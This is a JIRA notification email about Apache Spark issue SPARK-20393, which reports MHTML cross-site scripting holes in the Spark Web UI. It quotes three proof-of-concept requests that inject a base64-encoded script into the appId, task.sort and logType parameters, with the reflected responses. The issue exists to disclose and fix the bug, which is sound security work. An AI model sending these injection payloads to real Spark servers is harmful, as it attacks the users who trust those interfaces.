[
https://issues.apache.org/jira/browse/SPARK-20393?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16209902#comment-16209902
]
Apache Spark commented on SPARK-20393:
--------------------------------------
User 'ambauma' has created a pull request for this issue:
https://github.com/apache/spark/pull/19528
> Strengthen Spark to prevent XSS vulnerabilities
> -----------------------------------------------
>
> Key: SPARK-20393
> URL: https://issues.apache.org/jira/browse/SPARK-20393
> Project: Spark
> Issue Type: Bug
> Components: Web UI
> Affects Versions: 1.5.2, 2.0.2, 2.1.0
> Reporter: Nicholas Marion
> Assignee: Nicholas Marion
> Labels: security
> Fix For: 2.1.2, 2.2.0
>
>
> Using IBM Security AppScan Standard, we discovered several easy to recreate
> MHTML cross site scripting vulnerabilities in the Apache Spark Web GUI
> application and these vulnerabilities were found to exist in Spark version
> 1.5.2 and 2.0.2, the two levels we initially tested. Cross-site scripting
> attack is not really an attack on the Spark server as much as an attack on
> the end user, taking advantage of their trust in the Spark server to get them
> to click on a URL like the ones in the examples below. So whether the user
> could or could not change lots of stuff on the Spark server is not the key
> point. It is an attack on the user themselves. If they click the link the
> script could run in their browser and comprise their device. Once the
> browser is compromised it could submit Spark requests but it also might not.
> https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/
> {quote}
> Request: GET
> /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
> _AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
> HTTP/1.1
> Excerpt from response: <div class="row-fluid">No running application with ID
> Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> </div>
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET
> /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas
> k.pageSize=100 HTTP/1.1
> Excerpt from response: Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt
> eLength=0 HTTP/1.1
> Excerpt from response: ==== Bytes 0-0 of 0 of
> /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-
> Type: multipart/related; boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> {quote}
> security@apache was notified and recommended a PR.
--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org
For additional commands, e-mail: issues-h...@spark.apache.org
